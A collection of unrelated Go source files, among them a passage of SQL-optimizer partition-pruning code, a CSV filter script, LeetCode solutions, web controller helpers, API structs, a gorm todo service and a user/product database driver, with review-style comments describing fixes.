	paths, err := getPossibleAccessPaths(
		ds.SCtx(), &tableHintInfo{indexMergeHintList: ds.indexMergeHints, indexHintList: ds.IndexHints},
		ds.astIndexHints, ds.table, ds.DBName, ds.tableInfo.Name, ds.isForUpdateRead, true)
	if err != nil {
		return err
	}
	if paths, err = filterPathByIsolationRead(ds.SCtx(), paths, ds.tableInfo.Name, ds.DBName); err != nil {
		return err
	}
	ds.possibleAccessPaths = paths
	return nil
}
// resolveOptimizeHint narrows the partition-scoped optimizer hints of ds down
// to the ones applicable to the given partition, then re-resolves the access
// paths accordingly.
func (s *partitionProcessor) resolveOptimizeHint(ds *DataSource, partitionName model.CIStr) error {
	// Keep only the index / index-merge hints that target this partition.
	// The two loops previously duplicated the same filtering logic; it is
	// now factored into filterIndexHintsForPartition.
	if len(ds.IndexHints) > 0 {
		ds.IndexHints = filterIndexHintsForPartition(ds.IndexHints, partitionName)
	}
	if len(ds.indexMergeHints) > 0 {
		ds.indexMergeHints = filterIndexHintsForPartition(ds.indexMergeHints, partitionName)
	}
	// read from storage hint: drop each store preference unless this
	// partition is explicitly listed in the corresponding hint.
	if ds.preferStoreType&preferTiKV > 0 {
		if len(ds.preferPartitions[preferTiKV]) > 0 {
			ds.preferStoreType ^= preferTiKV
			for _, p := range ds.preferPartitions[preferTiKV] {
				if p.String() == partitionName.String() {
					ds.preferStoreType |= preferTiKV
				}
			}
		}
	}
	if ds.preferStoreType&preferTiFlash > 0 {
		if len(ds.preferPartitions[preferTiFlash]) > 0 {
			ds.preferStoreType ^= preferTiFlash
			for _, p := range ds.preferPartitions[preferTiFlash] {
				if p.String() == partitionName.String() {
					ds.preferStoreType |= preferTiFlash
				}
			}
		}
	}
	if ds.preferStoreType&preferTiFlash != 0 && ds.preferStoreType&preferTiKV != 0 {
		ds.SCtx().GetSessionVars().StmtCtx.AppendWarning(
			errors.New("hint `read_from_storage` has conflict storage type for the partition " + partitionName.L))
	}
	return s.resolveAccessPaths(ds)
}

// filterIndexHintsForPartition returns the hints that either carry no
// partition list (and hence always apply) or explicitly mention partitionName.
func filterIndexHintsForPartition(hints []indexHintInfo, partitionName model.CIStr) []indexHintInfo {
	filtered := make([]indexHintInfo, 0, len(hints))
	for _, hint := range hints {
		if len(hint.partitions) == 0 {
			filtered = append(filtered, hint)
			continue
		}
		for _, p := range hint.partitions {
			if p.String() == partitionName.String() {
				filtered = append(filtered, hint)
				break
			}
		}
	}
	return filtered
}
// checkTableHintsApplicableForPartition returns the (lowercase) names from
// partitions that do not belong to partitionSet.
func checkTableHintsApplicableForPartition(partitions []model.CIStr, partitionSet set.StringSet) []string {
	var unknown []string
	for _, part := range partitions {
		if partitionSet.Exist(part.L) {
			continue
		}
		unknown = append(unknown, part.L)
	}
	return unknown
}
// appendWarnForUnknownPartitions emits a statement warning listing the
// partitions referenced by hintName that do not exist on the table.
func appendWarnForUnknownPartitions(ctx sessionctx.Context, hintName string, unknownPartitions []string) {
	if len(unknownPartitions) == 0 {
		return
	}
	ctx.GetSessionVars().StmtCtx.AppendWarning(
		fmt.Errorf("unknown partitions (%s) in optimizer hint %s", strings.Join(unknownPartitions, ","), hintName))
}
// checkHintsApplicable warns about every hint referencing a partition outside
// partitionSet: index hints, index-merge hints and the read_from_storage hint.
func (*partitionProcessor) checkHintsApplicable(ds *DataSource, partitionSet set.StringSet) {
	for _, hint := range ds.IndexHints {
		unknown := checkTableHintsApplicableForPartition(hint.partitions, partitionSet)
		appendWarnForUnknownPartitions(ds.SCtx(), restore2IndexHint(hint.hintTypeString(), hint), unknown)
	}
	for _, hint := range ds.indexMergeHints {
		unknown := checkTableHintsApplicableForPartition(hint.partitions, partitionSet)
		appendWarnForUnknownPartitions(ds.SCtx(), restore2IndexHint(HintIndexMerge, hint), unknown)
	}
	unknown := checkTableHintsApplicableForPartition(ds.preferPartitions[preferTiKV], partitionSet)
	unknown = append(unknown,
		checkTableHintsApplicableForPartition(ds.preferPartitions[preferTiFlash], partitionSet)...)
	appendWarnForUnknownPartitions(ds.SCtx(), HintReadFromStorage, unknown)
}
// makeUnionAllChildren clones ds once per surviving partition described by
// `or`, resolving partition-scoped hints for every clone. Zero survivors
// produce an empty dual table; a single survivor is returned directly without
// the union-all node.
func (s *partitionProcessor) makeUnionAllChildren(ds *DataSource, pi *model.PartitionInfo, or partitionRangeOR, opt *logicalOptimizeOp) (LogicalPlan, error) {
	children := make([]LogicalPlan, 0, len(pi.Definitions))
	partitionNameSet := make(set.StringSet)
	usedDefinition := make(map[int64]model.PartitionDefinition)
	for _, r := range or {
		for i := r.start; i < r.end; i++ {
			// This is for `table partition (p0,p1)` syntax, only union the specified partition if has specified partitions.
			if len(ds.partitionNames) != 0 {
				if !s.findByName(ds.partitionNames, pi.Definitions[i].Name.L) {
					continue
				}
			}
			// Not a deep copy.
			newDataSource := *ds
			newDataSource.baseLogicalPlan = newBaseLogicalPlan(ds.SCtx(), plancodec.TypeTableScan, &newDataSource, ds.SelectBlockOffset())
			newDataSource.schema = ds.schema.Clone()
			newDataSource.Columns = make([]*model.ColumnInfo, len(ds.Columns))
			copy(newDataSource.Columns, ds.Columns)
			newDataSource.isPartition = true
			newDataSource.physicalTableID = pi.Definitions[i].ID
			// There are many expression nodes in the plan tree use the original datasource
			// id as FromID. So we set the id of the newDataSource with the original one to
			// avoid traversing the whole plan tree to update the references.
			newDataSource.SetID(ds.ID())
			err := s.resolveOptimizeHint(&newDataSource, pi.Definitions[i].Name)
			// Record the name even on error so hint checking stays consistent.
			partitionNameSet.Insert(pi.Definitions[i].Name.L)
			if err != nil {
				return nil, err
			}
			children = append(children, &newDataSource)
			usedDefinition[pi.Definitions[i].ID] = pi.Definitions[i]
		}
	}
	// Warn about hints naming partitions that were not selected above.
	s.checkHintsApplicable(ds, partitionNameSet)
	if len(children) == 0 {
		// No result after table pruning.
		tableDual := LogicalTableDual{RowCount: 0}.Init(ds.SCtx(), ds.SelectBlockOffset())
		tableDual.schema = ds.Schema()
		appendMakeUnionAllChildrenTranceStep(ds, usedDefinition, tableDual, children, opt)
		return tableDual, nil
	}
	if len(children) == 1 {
		// No need for the union all.
		appendMakeUnionAllChildrenTranceStep(ds, usedDefinition, children[0], children, opt)
		return children[0], nil
	}
	unionAll := LogicalPartitionUnionAll{}.Init(ds.SCtx(), ds.SelectBlockOffset())
	unionAll.SetChildren(children...)
	unionAll.SetSchema(ds.schema.Clone())
	appendMakeUnionAllChildrenTranceStep(ds, usedDefinition, unionAll, children, opt)
	return unionAll, nil
}
// pruneRangeColumnsPartition prunes partitions for `PARTITION BY RANGE COLUMNS`
// tables using the given conjunctive conditions. When the pruner cannot be
// built (non-nil error from makeRangeColumnPruner) it deliberately falls back
// to the full partition range rather than failing the query.
func (*partitionProcessor) pruneRangeColumnsPartition(ctx sessionctx.Context, conds []expression.Expression, pi *model.PartitionInfo, pe *tables.PartitionExpr, columns []*expression.Column) (partitionRangeOR, error) {
	result := fullRange(len(pi.Definitions))
	if len(pi.Columns) < 1 {
		return result, nil
	}
	pruner, err := makeRangeColumnPruner(columns, pi, pe.ForRangeColumnsPruning, pe.ColumnOffset)
	if err == nil {
		result = partitionRangeForCNFExpr(ctx, conds, pruner, result)
	}
	return result, nil
}
// Compile-time check that rangeColumnsPruner satisfies partitionRangePruner.
var _ partitionRangePruner = &rangeColumnsPruner{}
// rangeColumnsPruner is used by 'partition by range columns'.
type rangeColumnsPruner struct {
	// lessThan[i][j] is the upper bound of partition i for partitioning
	// column j; a nil entry represents MAXVALUE.
	lessThan [][]*expression.Expression
	// partCols are the partitioning columns, in partition-definition order.
	partCols []*expression.Column
}
// makeRangeColumnPruner builds a rangeColumnsPruner from the table's
// partition metadata. The partitioning columns are resolved through offsets
// into the schema built from columns, and every LessThan bound expression is
// cloned so the pruner owns its copies. Errors only when the metadata is
// internally inconsistent (definition/bound count mismatch).
func makeRangeColumnPruner(columns []*expression.Column, pi *model.PartitionInfo, from *tables.ForRangeColumnsPruning, offsets []int) (*rangeColumnsPruner, error) {
	if len(pi.Definitions) != len(from.LessThan) {
		return nil, errors.Trace(fmt.Errorf("internal error len(pi.Definitions) != len(from.LessThan) %d != %d", len(pi.Definitions), len(from.LessThan)))
	}
	schema := expression.NewSchema(columns...)
	partCols := make([]*expression.Column, len(offsets))
	for i, offset := range offsets {
		partCols[i] = schema.Columns[offset]
	}
	lessThan := make([][]*expression.Expression, 0, len(from.LessThan))
	for i := range from.LessThan {
		colVals := make([]*expression.Expression, 0, len(from.LessThan[i]))
		for j := range from.LessThan[i] {
			if from.LessThan[i][j] != nil {
				// Clone so later mutation of the table metadata cannot
				// affect the pruner.
				tmp := (*from.LessThan[i][j]).Clone()
				colVals = append(colVals, &tmp)
			} else {
				// nil bound means MAXVALUE.
				colVals = append(colVals, nil)
			}
		}
		lessThan = append(lessThan, colVals)
	}
	return &rangeColumnsPruner{lessThan, partCols}, nil
}
// fullRange returns the range covering every partition (no pruning).
func (p *rangeColumnsPruner) fullRange() partitionRangeOR {
	return fullRange(len(p.lessThan))
}
// getPartCol returns the partitioning column with the given unique ID, or
// nil when the ID does not belong to any partitioning column.
func (p *rangeColumnsPruner) getPartCol(colID int64) *expression.Column {
	for _, c := range p.partCols {
		if c.ID == colID {
			return c
		}
	}
	return nil
}
// partitionRangeForExpr maps a single predicate onto a half-open range
// [start, end) of partition indexes that may contain matching rows.
// ok is false when the expression cannot be used for pruning, in which case
// callers should treat the result as the full range.
func (p *rangeColumnsPruner) partitionRangeForExpr(sctx sessionctx.Context, expr expression.Expression) (start int, end int, ok bool) {
	op, ok := expr.(*expression.ScalarFunction)
	if !ok {
		return 0, len(p.lessThan), false
	}
	// Only simple comparisons and IS NULL are prunable.
	switch op.FuncName.L {
	case ast.EQ, ast.LT, ast.GT, ast.LE, ast.GE:
	case ast.IsNull:
		// isnull(col)
		if arg0, ok := op.GetArgs()[0].(*expression.Column); ok && len(p.partCols) == 1 && arg0.ID == p.partCols[0].ID {
			// Single column RANGE COLUMNS, NULL sorts before all other values: match first partition
			return 0, 1, true
		}
		return 0, len(p.lessThan), false
	default:
		return 0, len(p.lessThan), false
	}
	opName := op.FuncName.L
	// Normalize to the form <column> <op> <constant>, flipping the operator
	// when the constant appears on the left-hand side.
	var col *expression.Column
	var con *expression.Constant
	var argCol0, argCol1 *expression.Column
	var argCon0, argCon1 *expression.Constant
	var okCol0, okCol1, okCon0, okCon1 bool
	argCol0, okCol0 = op.GetArgs()[0].(*expression.Column)
	argCol1, okCol1 = op.GetArgs()[1].(*expression.Column)
	argCon0, okCon0 = op.GetArgs()[0].(*expression.Constant)
	argCon1, okCon1 = op.GetArgs()[1].(*expression.Constant)
	if okCol0 && okCon1 {
		col, con = argCol0, argCon1
	} else if okCol1 && okCon0 {
		col, con = argCol1, argCon0
		opName = opposite(opName)
	} else {
		return 0, len(p.lessThan), false
	}
	partCol := p.getPartCol(col.ID)
	if partCol == nil {
		// The column is not a partitioning column: cannot prune on it.
		return 0, len(p.lessThan), false
	}
	// If different collation, we can only prune if:
	// - expression is binary collation (can only be found in one partition)
	// - EQ operator, consider values 'a','b','ä' where 'ä' would be in the same partition as 'a' if general_ci, but is binary after 'b'
	// otherwise return all partitions / no pruning
	_, exprColl := expr.CharsetAndCollation()
	colColl := partCol.RetType.GetCollate()
	if exprColl != colColl && (opName != ast.EQ || !collate.IsBinCollation(exprColl)) {
		return 0, len(p.lessThan), true
	}
	start, end = p.pruneUseBinarySearch(sctx, opName, con)
	return start, end, true
}
// pruneUseBinarySearch returns the start and end of which partitions will match.
// If no match (i.e. value > last partition) the start partition will be the number of partition, not the first partition!
func (p *rangeColumnsPruner) pruneUseBinarySearch(sctx sessionctx.Context, op string, data *expression.Constant) (start int, end int) {
	var savedError error
	var isNull bool
	if len(p.partCols) > 1 {
		// Only one constant in the input, this will never be called with
		// multi-column RANGE COLUMNS :)
		return 0, len(p.lessThan)
	}
	charSet, collation := p.partCols[0].RetType.GetCharset(), p.partCols[0].RetType.GetCollate()
	// compare evaluates `lessThan[ith] <op> v` as an integer-valued boolean.
	// Evaluation errors and NULL results are remembered in savedError/isNull
	// and make the whole pruning attempt fall back to the full range below.
	compare := func(ith int, op string, v *expression.Constant) bool {
		for i := range p.partCols {
			if p.lessThan[ith][i] == nil { // MAXVALUE
				return true
			}
			expr, err := expression.NewFunctionBase(sctx, op, types.NewFieldType(mysql.TypeLonglong), *p.lessThan[ith][i], v)
			if err != nil {
				savedError = err
				return true
			}
			expr.SetCharsetAndCollation(charSet, collation)
			var val int64
			val, isNull, err = expr.EvalInt(sctx, chunk.Row{})
			if err != nil {
				savedError = err
				return true
			}
			if val > 0 {
				return true
			}
		}
		return false
	}
	length := len(p.lessThan)
	// Binary-search the sorted upper bounds for the first partition that can
	// hold the value, then widen according to the comparison operator.
	switch op {
	case ast.EQ:
		pos := sort.Search(length, func(i int) bool { return compare(i, ast.GT, data) })
		start, end = pos, pos+1
	case ast.LT:
		pos := sort.Search(length, func(i int) bool { return compare(i, ast.GE, data) })
		start, end = 0, pos+1
	case ast.GE, ast.GT:
		pos := sort.Search(length, func(i int) bool { return compare(i, ast.GT, data) })
		start, end = pos, length
	case ast.LE:
		pos := sort.Search(length, func(i int) bool { return compare(i, ast.GT, data) })
		start, end = 0, pos+1
	default:
		start, end = 0, length
	}
	// Something goes wrong, abort this pruning.
	if savedError != nil || isNull {
		return 0, len(p.lessThan)
	}
	if end > length {
		end = length
	}
	return start, end
}
// appendMakeUnionAllChildrenTranceStep records an optimizer-trace step
// describing how the original DataSource was replaced after partition
// pruning (dual / single child / union-all over children).
// NOTE(review): "Trance" is a typo for "Trace", kept because callers use
// this name.
func appendMakeUnionAllChildrenTranceStep(origin *DataSource, usedMap map[int64]model.PartitionDefinition, plan LogicalPlan, children []LogicalPlan, opt *logicalOptimizeOp) {
	if opt.tracer == nil {
		return
	}
	if len(children) == 0 {
		appendNoPartitionChildTraceStep(origin, plan, opt)
		return
	}
	var action, reason func() string
	// Sort the used partition definitions by ID for deterministic trace text.
	used := make([]model.PartitionDefinition, 0, len(usedMap))
	for _, def := range usedMap {
		used = append(used, def)
	}
	slices.SortFunc(used, func(i, j model.PartitionDefinition) int {
		return cmp.Compare(i.ID, j.ID)
	})
	if len(children) == 1 {
		newDS := plan.(*DataSource)
		newDS.SetID(origin.SCtx().GetSessionVars().AllocNewPlanID())
		action = func() string {
			return fmt.Sprintf("%v_%v becomes %s_%v", origin.TP(), origin.ID(), newDS.TP(), newDS.ID())
		}
		reason = func() string {
			return fmt.Sprintf("%v_%v has one needed partition[%s] after pruning", origin.TP(), origin.ID(), used[0].Name)
		}
	} else {
		action = func() string {
			buffer := bytes.NewBufferString(fmt.Sprintf("%v_%v becomes %s_%v with children[",
				origin.TP(), origin.ID(), plan.TP(), plan.ID()))
			for i, child := range children {
				if i > 0 {
					buffer.WriteString(",")
				}
				newDS := child.(*DataSource)
				newDS.SetID(origin.SCtx().GetSessionVars().AllocNewPlanID())
				fmt.Fprintf(buffer, "%s_%v", child.TP(), newDS.ID())
			}
			buffer.WriteString("]")
			return buffer.String()
		}
		reason = func() string {
			buffer := bytes.NewBufferString(fmt.Sprintf("%v_%v has multiple needed partitions[",
				origin.TP(), origin.ID()))
			for i, u := range used {
				if i > 0 {
					buffer.WriteString(",")
				}
				buffer.WriteString(u.Name.String())
			}
			buffer.WriteString("] after pruning")
			return buffer.String()
		}
	}
	opt.appendStepToCurrent(origin.ID(), origin.TP(), reason, action)
}
// appendNoPartitionChildTraceStep records an optimizer-trace step for the
// case where pruning removed every partition and ds was replaced by dual.
func appendNoPartitionChildTraceStep(ds *DataSource, dual LogicalPlan, opt *logicalOptimizeOp) {
	reason := func() string {
		return fmt.Sprintf("%v_%v doesn't have needed partition table after pruning", ds.TP(), ds.ID())
	}
	action := func() string {
		return fmt.Sprintf("%v_%v becomes %v_%v", ds.TP(), ds.ID(), dual.TP(), dual.ID())
	}
	opt.appendStepToCurrent(dual.ID(), dual.TP(), reason, action)
}
|
package main
import (
"encoding/csv"
"fmt"
"io"
"os"
)
// main reads unprocessed_data.csv, skips the header rows, and for each row
// whose 7th column is "yes" writes a two-column pair (col0_col1, col2_col3)
// to processed.csv, reporting the number of lines written.
// Fixes over the original: csv.Writer.Write errors are no longer ignored,
// the buffered writer is flushed explicitly and its deferred error checked,
// and the header-skip comment now matches the code (it skips two rows, not
// four as the old comment claimed).
func main() {
	// Open unprocessed csv file
	infile, err := os.Open("unprocessed_data.csv")
	if err != nil {
		panic(err)
	}
	defer infile.Close()
	// Create reader for unprocessed csv file
	reader := csv.NewReader(infile)
	// Create new csv for parsed data
	outfile, err := os.Create("processed.csv")
	if err != nil {
		panic(err)
	}
	defer outfile.Close()
	// Create writer for new csv
	writer := csv.NewWriter(outfile)
	var lineCount int
	skipCount := 2 // number of header rows to skip
	for {
		// Read current row of unprocessed csv
		row, err := reader.Read()
		if err == io.EOF {
			break
		} else if err != nil {
			panic(err)
		}
		// Skip the two header rows
		if skipCount > 0 {
			skipCount--
			continue
		}
		// Check if connection was selected for article
		if row[6] == "yes" {
			// Write relevant values to csv, surfacing write errors
			pair := []string{row[0] + "_" + row[1], row[2] + "_" + row[3]}
			if err := writer.Write(pair); err != nil {
				panic(err)
			}
			lineCount++
		}
	}
	// Flush buffered output and surface any deferred write error.
	writer.Flush()
	if err := writer.Error(); err != nil {
		panic(err)
	}
	fmt.Println(lineCount, "lines were written to processed.csv")
}
|
package main
import (
"strings"
"fmt"
)
// simplifyPath canonicalizes a Unix-style path (LeetCode 71): collapses
// repeated slashes, drops "." segments, and resolves ".." against the
// segments accumulated so far. The result always starts with "/".
func simplifyPath(path string) string {
	var stack []string
	for _, seg := range strings.Split(path, "/") {
		switch seg {
		case "", ".":
			// empty segments come from "//" runs; "." is the current dir
		case "..":
			// pop one level, but never above the root
			if len(stack) > 0 {
				stack = stack[:len(stack)-1]
			}
		default:
			stack = append(stack, seg)
		}
	}
	if len(stack) == 0 {
		return "/"
	}
	return "/" + strings.Join(stack, "/")
}
// main demonstrates simplifyPath on a sample path.
func main() {
	fmt.Println(simplifyPath("/a/../../b/../c//.//"))
}
|
// myPow computes x raised to the integer power n (LeetCode 50).
// It delegates to sol2, so the actual cost is O(log n) time and
// O(log n) stack space for the recursion — the old O(n) note was stale.
func myPow(x float64, n int) float64 {
	return sol2(x, n)
}
// sol2 computes x^n by binary exponentiation.
// time: O(log n), space: O(log n) recursion depth (the old O(1) note was
// inaccurate for a recursive implementation).
// Fixes over the original: negating the minimum int value overflowed
// (nn = -n stayed negative, sending p into infinite recursion), and p
// itself now guards against n <= 0.
func sol2(x float64, n int) float64 {
	if n == 0 {
		return 1
	}
	if n > 0 {
		return p(x, n)
	}
	// Negative exponent: x^n = 1 / x^(-n). When n is the minimum int, -n
	// overflows (stays negative), so peel off one factor of x first.
	if -n < 0 {
		return 1 / x * sol2(x, n+1)
	}
	return 1 / p(x, -n)
}
// p recursively computes x^n for n >= 1 via squaring.
func p(x float64, n int) float64 {
	if n <= 0 {
		// Defensive guard: the original recursed forever on n == 0.
		return 1
	}
	if n == 1 {
		return x
	}
	res := p(x, n/2)
	if n%2 == 0 {
		return res * res
	}
	return res * res * x
}
// time: O(n), space: O(1)
// sol1 is the straightforward repeated-multiplication solution, with
// shortcut exits for the fixed points x == 0, 1, and -1.
func sol1(x float64, n int) float64 {
	// 1^n, 0^n and (-1)^odd all equal x itself.
	// Note: in Go, n%2 is -1 for negative odd n, hence the double check.
	if x == 1 || x == 0 || (x == -1 && (n%2 == 1 || n%2 == -1)) {
		return x
	}
	// Remaining x == -1 case: even exponent, so the answer is 1.
	if x == -1 {
		return -x
	}
	// Fold a negative exponent into the base.
	if n < 0 {
		x, n = 1/x, -n
	}
	result := 1.0
	for ; n > 0; n-- {
		result *= x
	}
	return result
}
|
package controllers
import "github.com/w2hhda/candy/models"
// Canned API responses shared by every controller. Code 0 means success;
// the 1000x codes are error categories (messages are in Chinese: invalid
// parameters, database error, parse failure).
// NOTE(review): successReturn is package-level shared state and RetSuccess
// mutates its Value field, which races under concurrent requests — confirm
// and fix at the call site.
var (
	successReturn = &models.Response{0, "success", new(interface{})}
	errParams     = &models.Response{10001, "输入的参数不正确", new(interface{})}
	errDB         = &models.Response{10002, "数据库错误", new(interface{})}
	errParse      = &models.Response{10003, "数据解析失败", new(interface{})}
)
// RetError serializes the given error response as JSON (with an explicit
// UTF-8 content type) and aborts further processing of the request.
func (base *BaseController) RetError(e *models.Response) {
	base.Ctx.Output.Header("Content-Type", "application/json; charset=utf-8")
	base.Data["json"] = e
	base.ServeJSON()
	base.StopRun()
}
// RetSuccess writes a success response (code 0) carrying data as its Value,
// then aborts further processing of the request.
// The shared successReturn template is copied per call instead of being
// mutated in place, so concurrent requests can no longer race on its Value
// field (the original wrote data into the package-level struct).
func (base *BaseController) RetSuccess(data interface{}) {
	resp := *successReturn
	resp.Value = data
	base.Data["json"] = &resp
	base.ServeJSON()
	base.StopRun()
}
// RetLayuiPage writes a LayUI table-pagination response (code 0) carrying
// the total row count and the current page's rows, then aborts further
// processing of the request.
func (base *BaseController) RetLayuiPage(count int64, data interface{}) {
	base.Data["json"] = models.LayuiPageResponse{
		Code:  0,
		Msg:   "success",
		Count: count,
		Data:  data,
	}
	base.ServeJSON()
	base.StopRun()
}
|
package requests
// KeyStruct wraps a single resource key as it appears in nested JSON
// objects (used by GetBookByISBN for author/work references).
type KeyStruct struct {
	Key string `json:"key"`
}
// GetBookByISBN models a book lookup response keyed by ISBN. AuthorId and
// WorkId hold resource keys for follow-up requests; BookId is the book's
// own key. The tag names ("publishers", "works", "key") suggest the
// OpenLibrary API — confirm against the caller.
type GetBookByISBN struct {
	Publisher     []string    `json:"publishers"`
	Title         string      `json:"title"`
	NumberOfPages uint        `json:"number_of_pages"`
	PublishDate   string      `json:"publish_date"`
	AuthorId      []KeyStruct `json:"authors"`
	WorkId        []KeyStruct `json:"works"`
	BookId        string      `json:"key"`
}
// GetGoogleBookByISBN models the subset of the Google Books volumes
// response this app consumes: for each item, its id plus the volumeInfo
// fields (title, authors, publisher, dates, description, page count,
// language, and a thumbnail link).
type GetGoogleBookByISBN struct {
	Items []struct {
		Id         string `json:"id"`
		VolumeInfo struct {
			Title         string   `json:"title"`
			Authors       []string `json:"authors"`
			Publisher     string   `json:"publisher"`
			PublishedDate string   `json:"publishedDate"`
			Description   string   `json:"description"`
			NumberOfPages uint     `json:"pageCount"`
			Language      string   `json:"language"`
			ImageLinks    struct {
				Thumbnail string `json:"thumbnail"`
			} `json:"imageLinks"`
		} `json:"volumeInfo"`
	} `json:"items"`
}
// GetBookByWorkId models a work-level lookup response carrying only the
// work's description and title.
type GetBookByWorkId struct {
	Description string `json:"description"`
	Title       string `json:"title"`
}
// CreateBook is the inbound payload (JSON body or form) for registering a
// book: its ISBN, the minimum deposit required, and an availability flag.
type CreateBook struct {
	ISBN       string `json:"isbn" form:"isbn"`
	MinDeposit uint   `json:"min_deposit" form:"min_deposit"`
	Status     bool   `json:"status" form:"status"`
}
|
package todo
import (
"github.com/jinzhu/gorm"
"mingchuan.me/api"
)
// TodoService bundles the database handle with a service version number and
// exposes the todo CRUD behavior; it embeds *gorm.DB so gorm methods can be
// called on the service directly.
type TodoService struct {
	*gorm.DB
	Version uint16
}
// Todo is the persisted TODO item: an auto-managed primary key plus the
// free-form text content (non-null at the database level).
type Todo struct {
	ID      int64  `gorm:"primary_key" json:"id"`
	Content string `gorm:"type:text; not null" json:"content"`
}
// NewService builds a TodoService bound to the given database handle,
// at service version 1.
func NewService(db *gorm.DB) *TodoService {
	srv := &TodoService{DB: db}
	srv.Version = 1
	return srv
}
// Init prepares the service for use by auto-migrating the Todo table,
// returning any migration error.
func (srv *TodoService) Init() error {
	return srv.DB.AutoMigrate(&Todo{}).Error
}
// RegisterAPI creates this service's controller and binds all of its
// routes onto the given API instance.
func (srv *TodoService) RegisterAPI(api *api.API) {
	ctrl := CreateController(api, srv)
	ctrl.BindAllRoutes()
}
|
package main
import (
"database/sql"
"fmt"
"github.com/gofrs/uuid"
"golang.org/x/crypto/bcrypt"
)
// Login retrieves the user ID matching the given credentials.
// Returns EmptyRows when no account exists for the email,
// InvalidEmailOrPassword on other lookup failures, and IncorrectPassword
// when the bcrypt comparison fails.
// Fixes over the original: the sql.ErrNoRows check sat after the generic
// err != nil return and was unreachable; it is now checked first. The debug
// print no longer logs the hash and plaintext password bytes.
func (d *DBDriver) Login(email string, password string) (string, error) {
	var data SignInCreds
	err := d.Conn.Get(&data, `SELECT id, password_hash FROM users WHERE email=$1`, email)
	if err == sql.ErrNoRows {
		fmt.Println("no rows here")
		return "", EmptyRows
	}
	if err != nil {
		fmt.Println(err)
		return "", InvalidEmailOrPassword
	}
	err = bcrypt.CompareHashAndPassword(data.PasswordHash, []byte(password))
	if err != nil {
		// Log only the comparison error — never credentials.
		fmt.Println(err)
		return "", IncorrectPassword
	}
	return data.ID, nil
}
// Signup hashes the password, generates the user ID plus the verification
// and reset-password tokens, and inserts the new account row (unverified).
// Returns ViolateUNUsername / ViolateUNEmail when the username or email
// unique constraint is violated, SignupError for any other failure.
func (d *DBDriver) Signup(username string, email string, password string) error {
	passwordHash, err := bcrypt.GenerateFromPassword([]byte(password), bcrypt.DefaultCost)
	if err != nil {
		return SignupError
	}
	// generates user ID
	userId, err := uuid.NewV4()
	if err != nil {
		return SignupError
	}
	idstr := userId.String()
	// generates verification token (emailed to the user after signup)
	verificationToken, err := uuid.NewV4()
	if err != nil {
		return SignupError
	}
	vToken := verificationToken.String()
	// generates reset password token
	resetPasswordToken, err := uuid.NewV4()
	if err != nil {
		return SignupError
	}
	passToken := resetPasswordToken.String()
	query := `INSERT INTO users (id, email, username, password_hash, verified, verification_token, reset_pass_token) VALUES (:ID, :Email, :Username, :PasswordHash, :Verification, :VerificationToken, :ResetPassToken)`
	_, err = d.Conn.NamedExec(query, map[string]interface{}{
		"ID":                idstr,
		"Email":             email,
		"Username":          username,
		"PasswordHash":      passwordHash,
		"Verification":      false,
		"VerificationToken": vToken,
		"ResetPassToken":    passToken,
	})
	if err != nil {
		// Map unique-constraint violations onto specific sentinel errors.
		if IsUniqueConstraintError(err, UniqueConstraintUsername) {
			fmt.Println("violate username uq")
			return ViolateUNUsername
		}
		if IsUniqueConstraintError(err, UniqueConstraintEmail) {
			fmt.Println("violate email uq")
			return ViolateUNEmail
		}
		return SignupError
	}
	return nil
}
// GetVerifToken looks up the verification token issued to the given
// username/email pair at signup; returns BadRequestError when the lookup
// fails for any reason.
func (d *DBDriver) GetVerifToken(username string, email string) (string, error) {
	var verifToken string
	if err := d.Conn.Get(&verifToken, `SELECT verification_token FROM users WHERE username=$1 AND email=$2`, username, email); err != nil {
		return "", BadRequestError
	}
	return verifToken, nil
}
// AddProducts upserts the products retrieved from the Coinbase API: rows
// whose id is not yet present are inserted, existing rows are updated.
// Fix over the original: a real lookup failure (any error other than
// sql.ErrNoRows) used to fall through to the UPDATE branch; it now aborts
// with BadRequestError instead.
func (d *DBDriver) AddProducts(products []Products) error {
	var query string
	var id string
	for _, product := range products {
		err := d.Conn.Get(&id, `SELECT id FROM products WHERE id=$1`, product.ID)
		switch {
		case err == sql.ErrNoRows:
			// Unknown product: insert a fresh row.
			query = `INSERT INTO products (id, base_currency, quote_currency, base_min_size, base_max_size, quote_increment, base_increment, display_name, min_market_funds, max_market_funds, margin_enabled, post_only, limit_only, cancel_only, status, status_message)
			VALUES(:ID, :BaseCurrency, :QuoteCurrency, :BaseMinSize, :BaseMaxSize, :QuoteIncrement, :BaseIncrement, :DisplayName, :MinMarketFunds, :MaxMarketFunds, :MarginEnabled, :PostOnly, :LimitOnly, :CancelOnly, :Status, :StatusMessage)`
		case err != nil:
			// Genuine lookup failure — do not guess insert vs update.
			return BadRequestError
		default:
			query = `UPDATE products SET id=:ID, base_currency=:BaseCurrency, quote_currency=:QuoteCurrency, base_min_size=:BaseMinSize, base_max_size=:BaseMaxSize, quote_increment=:QuoteIncrement, base_increment=:BaseIncrement, display_name=:DisplayName, min_market_funds=:MinMarketFunds, max_market_funds=:MaxMarketFunds, margin_enabled=:MarginEnabled, post_only=:PostOnly, limit_only=:LimitOnly, cancel_only=:CancelOnly, status=:Status, status_message=:StatusMessage
			WHERE id=:ID`
		}
		_, err = d.Conn.NamedExec(query, map[string]interface{}{
			"ID":             product.ID,
			"BaseCurrency":   product.BaseCurrency,
			"QuoteCurrency":  product.QuoteCurrency,
			"BaseMinSize":    product.BaseMinSize,
			"BaseMaxSize":    product.BaseMaxSize,
			"QuoteIncrement": product.QuoteIncrement,
			"BaseIncrement":  product.BaseIncrement,
			"DisplayName":    product.DisplayName,
			"MinMarketFunds": product.MinMarketFunds,
			"MaxMarketFunds": product.MaxMarketFunds,
			"MarginEnabled":  product.MarginEnabled,
			"PostOnly":       product.PostOnly,
			"LimitOnly":      product.LimitOnly,
			"CancelOnly":     product.CancelOnly,
			"Status":         product.Status,
			"StatusMessage":  product.StatusMessage,
		})
		if err != nil {
			return BadRequestError
		}
	}
	return nil
}
// GetProducts returns every row of the products table, or DbQueryError on
// lookup failure. The original checked sql.ErrNoRows after the generic
// err != nil return, making that branch unreachable (and sqlx Select yields
// an empty slice rather than ErrNoRows anyway), so the dead check is gone.
func (d *DBDriver) GetProducts() ([]ProductsList, error) {
	data := []ProductsList{}
	err := d.Conn.Select(&data, `SELECT * FROM products`)
	if err != nil {
		return nil, DbQueryError
	}
	return data, nil
}
// UpdateTicker upserts a ticker row: inserts when no row exists for the id,
// updates otherwise.
// Fix over the original: any lookup error (not just sql.ErrNoRows) used to
// be treated as "row missing" and routed to INSERT; real errors now return
// DbQueryError instead.
